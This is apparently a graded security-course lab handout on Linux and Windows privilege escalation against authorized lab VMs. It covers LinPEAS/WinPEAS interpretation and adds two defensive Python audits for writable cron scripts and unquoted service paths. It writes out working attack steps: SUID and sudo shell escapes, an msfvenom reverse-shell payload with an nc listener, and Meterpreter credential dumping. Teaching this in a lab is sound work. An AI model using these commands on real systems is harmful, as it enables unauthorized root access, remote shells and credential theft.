Week 9 graded lab. Linux (LinPEAS) + Windows (WinPEAS). Authorized lab VMs only.
Learning objectives
- Obtain an initial low-privilege shell and determine the escalation surface
- Run LinPEAS and WinPEAS and interpret their output by technique family
- Execute at least one Linux and one Windows privilege escalation to achieve root / SYSTEM
- Produce a lab report with annotated tool output and proof screenshots
Authorization
Targets:
- Metasploitable 2 (Linux privesc exercises)
- Instructor-provided Windows lab VM (Windows privesc exercises)
All targets are authorized lab VMs. Do not apply these techniques to any other system.
Linux privilege escalation (Metasploitable 2)
Step 1: Initial foothold
Obtain a shell on Metasploitable 2. Use any technique from Lab 7 (vsftpd backdoor, UnrealIRCd, Samba). The initial shell privilege level will be either a specific service user or an interactive user account.
Confirm the initial privilege:
id
whoami
uname -a
hostname
Note: Some Lab 7 exploits (vsftpd, UnrealIRCd backdoors) give root directly. If your initial shell is already root, use a different Lab 7 technique that gives a lower-privileged shell, or manually drop to a user account:
# From root shell, switch to low-privilege user:
su msfadmin
id # should show uid=1000(msfadmin)
Step 2: Transfer and run LinPEAS
LinPEAS is on Kali at /usr/share/peass/linpeas/linpeas.sh (install with sudo apt install peass -y if missing).
Transfer to the target:
# On Kali: serve LinPEAS over HTTP
python3 -m http.server 8080 --directory /usr/share/peass/linpeas/
# On target (in your shell):
cd /tmp
wget http://<kali-ip>:8080/linpeas.sh
chmod +x linpeas.sh
Run LinPEAS and capture full output:
./linpeas.sh | tee linpeas-output.txt
LinPEAS runs for several minutes. Do not interrupt it.
Step 3: Interpret LinPEAS output
LinPEAS color-codes findings:
- Red/bold: high-severity escalation paths
- Yellow: medium-severity
- Blue/bold: interesting system information
For each red finding, identify its technique family:
| LinPEAS category | Technique family | Escalation path description |
|---|---|---|
| SUID binaries | SUID abuse | Binary runs as root; use GTFOBins to find shell escape |
| Sudo rights | sudo misconfiguration | Binary executable without password via sudo; use GTFOBins |
| Cron jobs | Writable cron script | Root cron job references a file the current user can write |
| Files with capabilities | Linux capabilities | Capability like cap_setuid allows uid manipulation |
| Writable files | Path hijacking or script injection | Writable file executed by a higher-privilege process |
Document: For each red finding, write one row in the following table:
| LinPEAS finding | Technique family | Escalation path | Confidence (High/Med/Low) |
|---|---|---|---|
| nmap has SUID bit | SUID abuse | GTFOBins: nmap --interactive; !sh gives root shell | High |
| ... | ... | ... | ... |
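An added audit for the "Writable cron script" row of the technique table (example code written for this edit, not part of the lab material or of LinPEAS): it parses system-crontab lines (the /etc/crontab format with a user field), flags referenced files that any local user can modify, and applies the chmod go-w fix. The two scripts and the crontab text are a constructed fixture in a private temp dir; nothing about the lab target is assumed.

```python
import os
import re
import stat
import tempfile

# System crontab format (/etc/crontab, /etc/cron.d/*): minute hour dom month dow user command
CRON_LINE = re.compile(r'^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+?)\s*$')

def referenced_paths(cmd):
    """Absolute paths named in a cron command (the script plus any files it is given)."""
    return [tok for tok in re.split(r'[\s;|&]+', cmd) if tok.startswith('/')]

def writable_by_others(path):
    """True when the 'other' write bit is set, i.e. any local user can edit the file."""
    return bool(os.lstat(path).st_mode & stat.S_IWOTH)

def audit_crontab(text):
    """Return (cron_user, path) for each entry whose referenced file any user could modify:
    the 'Writable cron script' family, since the job itself runs as cron_user (often root)."""
    findings = []
    for line in text.splitlines():
        m = CRON_LINE.match(line)
        if not m or line.lstrip().startswith('#'):
            continue
        for p in referenced_paths(m.group('cmd')):
            if os.path.isfile(p) and writable_by_others(p):
                findings.append((m.group('user'), p))
    return findings

def harden(path):
    """Mitigation: clear group/other write bits (equivalent to chmod go-w)."""
    os.chmod(path, stat.S_IMODE(os.lstat(path).st_mode) & ~(stat.S_IWGRP | stat.S_IWOTH))

def demo():
    """Constructed fixture: two scripts in a private temp dir, one left world-writable,
    both referenced by root cron entries. Returns findings before and after hardening."""
    d = tempfile.mkdtemp()
    backup, rotate = os.path.join(d, 'backup.sh'), os.path.join(d, 'rotate.sh')
    for p, mode in ((backup, 0o777), (rotate, 0o755)):
        with open(p, 'w') as f:
            f.write('#!/bin/sh\necho placeholder\n')
        os.chmod(p, mode)
    crontab = ('SHELL=/bin/sh\n# m h dom mon dow user command\n'
               '*/5 * * * * root %s\n0 3 * * * root %s --weekly\n' % (backup, rotate))
    before = audit_crontab(crontab)
    for _, p in before:
        harden(p)
    return before, audit_crontab(crontab)
```

User crontabs (no user field) and @daily-style entries are not parsed; the same check applies to the script's parent directory if that is world-writable.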
Step 4: Execute the escalation
Choose the highest-confidence escalation path and execute it. Common options on Metasploitable 2:
SUID nmap (if present):
# Check: ls -la $(which nmap)
# If SUID: -rwsr-xr-x root root
nmap --interactive
nmap> !sh
# New shell: run id -- should show uid=0(root)
SUID find (if present):
find / -name "flag.txt" -exec /bin/sh \;
# If find has SUID, the -exec command runs as root
Sudo Python (if sudo allows python without password):
sudo python -c 'import os; os.system("/bin/bash")'
# Metasploitable 2 ships Python 2 as "python" (no python3); on hosts that have python3 the same one-liner works with it
Proof screenshot: id showing uid=0(root).
Windows privilege escalation (Instructor-provided lab VM)
Pre-requisite
The instructor provides an RDP connection or a low-privilege shell to a Windows lab VM. The lab VM has at least one intentional privilege escalation path.
Step 1: Establish session
Connect to the Windows VM with the provided low-privilege credentials. Verify the initial privilege:
whoami
whoami /priv
net user %username%
Step 2: Transfer and run WinPEAS
Option A -- via Meterpreter:
# From a Meterpreter session:
meterpreter > upload /usr/share/peass/winpeas/winPEASany.exe C:\\Windows\\Temp\\winpeas.exe
meterpreter > shell
C:\Windows\Temp\winpeas.exe -ansi > C:\Windows\Temp\winpeas-output.txt
# cmd.exe has no tee: redirect to a file, then review it with "type" or download it to Kali
Option B -- via HTTP download on the target (first serve the WinPEAS directory on Kali: python3 -m http.server 8080 --directory /usr/share/peass/winpeas/):
mkdir C:\Temp
powershell -c "Invoke-WebRequest http://<kali-ip>:8080/winPEASany.exe -OutFile C:\Temp\winpeas.exe"
C:\Temp\winpeas.exe -ansi > C:\Temp\winpeas-output.txt
Step 3: Interpret WinPEAS output
WinPEAS highlights critical findings in red. For each critical finding, identify the technique family:
| WinPEAS finding category | Technique family |
|---|---|
| Unquoted service paths | Path interception |
| Modifiable services / binaries | Service binary overwrite |
| AlwaysInstallElevated | MSI installer escalation |
| Interesting privileges (SeImpersonate) | Token impersonation |
| Stored credentials | Credential reuse |
Document: Same table format as the Linux section.
Step 4: Execute the escalation
Execute one Windows escalation path to achieve SYSTEM.
Example: Unquoted service path (if present)
# WinPEAS identifies: C:\Program Files\Vulnerable Service\sub dir\service.exe
# The space in "sub dir" and the unquoted path means Windows may execute:
# C:\Program.exe (if exists) or C:\Program Files\Vulnerable.exe (if exists)
# Create a payload on Kali, then place it on the target at the hijack path:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<kali-ip> LPORT=4444 -f exe -o Vulnerable.exe
# Transfer Vulnerable.exe to "C:\Program Files\Vulnerable.exe" (Meterpreter upload or the HTTP method from Step 2)
# Set up listener on Kali:
nc -lvnp 4444
# Restart the service on Windows (if you have that privilege):
sc stop VulnService
sc start VulnService
Proof screenshot: whoami showing nt authority\system (or equivalent administrator-level output from the shell).
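An added audit for the unquoted service path mechanism described above (example code written for this edit, not part of the lab material or of WinPEAS): it lists every prefix Windows would probe for a given ImagePath, generalizing the two named in the comments to the full list, and builds the `sc config` command that quotes the path, which is the remediation a finding in the report should recommend. `VulnService` is the page's placeholder service name.

```python
import re

def unquoted_path_candidates(image_path):
    """Executables Windows would probe, in order, before reaching the intended binary of an
    unquoted service path. A quoted path, or one with no space before the .exe, yields []."""
    path = image_path.strip()
    if path.startswith('"'):
        return []
    parts = path.split(' ')
    candidates = []
    for i in range(1, len(parts) + 1):
        prefix = ' '.join(parts[:i])
        if prefix.lower().endswith('.exe'):
            break                           # the real binary; anything after it is arguments
        candidates.append(prefix + '.exe')  # a prefix ending at a space gets .exe appended
    else:
        candidates.pop()  # no extension given: the last entry is the intended binary itself
    return candidates

def quoted_image_path(image_path):
    """Hardened ImagePath: the executable wrapped in double quotes, arguments untouched."""
    path = image_path.strip()
    if path.startswith('"'):
        return path
    m = re.match(r'(?i)(.+?\.exe)(\s.*)?$', path)
    binary, args = (m.group(1), m.group(2) or '') if m else (path, '')
    return '"%s"%s' % (binary, args)

def sc_config_command(service, image_path):
    """cmd.exe command that applies the fix; sc.exe needs the space after 'binPath=' and the
    inner quotes escaped with backslashes."""
    return 'sc config %s binPath= "%s"' % (service, quoted_image_path(image_path).replace('"', '\\"'))

def audit_service(service, image_path):
    """One finding row for the report: hijack candidates and the remediation command."""
    cands = unquoted_path_candidates(image_path)
    return {'service': service, 'vulnerable': bool(cands), 'candidates': cands,
            'fix': sc_config_command(service, image_path) if cands else None}
```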
Step 5 (bonus): Credential extraction
From a SYSTEM Meterpreter session:
meterpreter > load kiwi
meterpreter > creds_all
Document what credential material is accessible (NTLM hashes, plaintext passwords if WDigest is enabled). Do not include real credential values in any document outside the private lab Git repo.
Deliverable
A lab report with two sections (Linux and Windows).
Each section:
- Initial foothold description (how you obtained the first shell; privilege level)
- LinPEAS / WinPEAS summary table (annotated -- not raw tool output)
- Successful escalation steps (step-by-step from the low-privilege state to root/SYSTEM; copy from session log)
- Proof screenshot
- Business impact paragraph: what does root/SYSTEM access on this host enable an attacker to do, in client-addressable terms?
Appendix: linpeas-output.txt and winpeas-output.txt (raw output for grader reference).